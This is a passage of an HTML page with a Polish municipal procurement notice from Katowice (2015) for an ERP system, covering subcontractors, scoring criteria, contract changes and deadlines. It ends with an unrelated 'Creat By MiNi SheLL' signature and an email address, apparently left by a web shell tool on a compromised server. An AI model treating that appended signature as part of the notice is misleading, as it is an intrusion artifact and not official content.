e)     sposób wykorzystania zasobów innego podmiotu przez wykonawcę przy wykonywaniu zamówienia (np. podwykonawstwo, konsultacje, doradztwo); w sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia; w przypadku gdy podmiot trzeci będzie brał udział w realizacji zamówienia w charakterze podwykonawcy należy wskazać część zamówienia, którą będzie realizował;

f)     charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem (np. umowa cywilno-prawna, umowa o współpracy),

g)      okresu udziału innego podmiotu przy wykonywaniu zamówienia (co najmniej na czas realizacji zamówienia).

12)   Podwykonawcy

1)   Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.

2)   Jeśli wykonanie zamówienia zostanie powierzone podwykonawcom - wykonawca w swojej ofercie winien wskazać, którą część będzie wykonywał podwykonawca. W przypadku gdy wykonawca, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, powołuje się na zasadach określonych w art. 26 ust. 2b ustawy na zasoby podmiotu trzeciego, a podmiot ten wykonuje część zamówienia to wykonawca w swojej ofercie winien również podać nazwę (firmę) tych podmiotów (podwykonawców).

3)   Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym, niż wymagany w trakcie postępowania o udzielenie zamówienia.

Uwaga!

Zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane w razie konieczności, szczególnie gdy wykaz lub dowody, o których mowa w pkt 16.2 SIWZ budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego dostawy lub usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów, bezpośrednio zamawiającemu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - czas usunięcia wad - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)     Zmiana postanowień umowy może nastąpić wyłącznie na warunkach określonych poniżej:

a)     Zamawiający z ważnych przyczyn nie dających się przewidzieć w chwili zawarcia umowy wstrzyma wykonanie prac;

b)     konieczność wprowadzenia zmian wyniknie na skutek zmian w obowiązujących aktach prawnych i/lub dokumentach związanych z wdrażaniem Regionalnego Programu Operacyjnego Województwa Śląskiego wpływających na zakres lub treść opracowań będących przedmiotem umowy,

c)      nastąpi zmiana obowiązującej stawki VAT;

d)     zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można było uniknąć ani im zapobiec;

e)     Instytucja Zarządzająca ogłosi konkurs składania wniosków o dofinansowanie z terminem krótszym lub zdecydowanie dłuższym niż termin wykonania przedmiotu umowy.

2)     Zmiana umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Katowice, Wydział Informatyki ul. Rynek 1, 40-003 Katowice pokój 411 (IV piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2015 godzina 10:00, miejsce: Urząd Miasta Katowice, Wydział Informatyki ul. Rynek 1, 40-003 Katowice, pokój 411 (IV piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest współfinansowane przez Unię Europejską.

2. Do porównania i oceny ofert w kryterium czas usunięcia wad stosowana będzie poniższa zasada:

Ocenie podlegać będzie deklarowany czas usunięcia wady od dnia otrzymania zgłoszenia od Zamawiającego o konieczności usunięcia wad powstałych w trakcie trwania okresu gwarancji i rękojmi. Zamawiający wymaga, aby deklarowany czas usunięcia wady zawierał się w zakresie od 3 do 7 dni roboczych. Do obliczenia punktów stosowany będzie zasada :

Jeśli  wykonawca  zaproponuje   czasu usunięcia wady w terminie:

3 dni roboczych - otrzyma 100 pkt

4 dni roboczych -  75 pkt,

5 dni roboczych - 50 pkt

6 dni roboczych - 25 pkt

przemnożonych przez wagę tego kryterium tj. 10 %

Za zaproponowanie czasu usunięcia wady od momentu zgłoszenia w terminie 7 dni roboczych wykonawca otrzyma 0 punktów z tym, że nie spowoduje to odrzucenia oferty. Jeśli Wykonawca zaproponuje czas usunięcia wady w terminie dłuższym niż 7 dni spowoduje to odrzucenie oferty.

Jeśli wykonawca zaproponuje czas usunięcia wady w terminie krótszym  niż 3 dni roboczych otrzyma maksymalna ilość punktów.

3.   Nie podlegają wkluczeniu z postępowania Wykonawcy na podstawie art. 24 pzp. z zastrzeżeniem, że Zamawiający nie przewiduje możliwości wykluczenia z postępowania wykonawcy na podstawie art. 24 ust. 2a.

4.   Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania (w tym wykonawcę Koncepcji wdrożenia systemu ERP w Urzędzie Miasta Katowice i jednostkach organizacyjnych Miasta Katowice zwanej dalej Koncepcją stanowiącej Zał.  nr 9 do SIWZ), lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com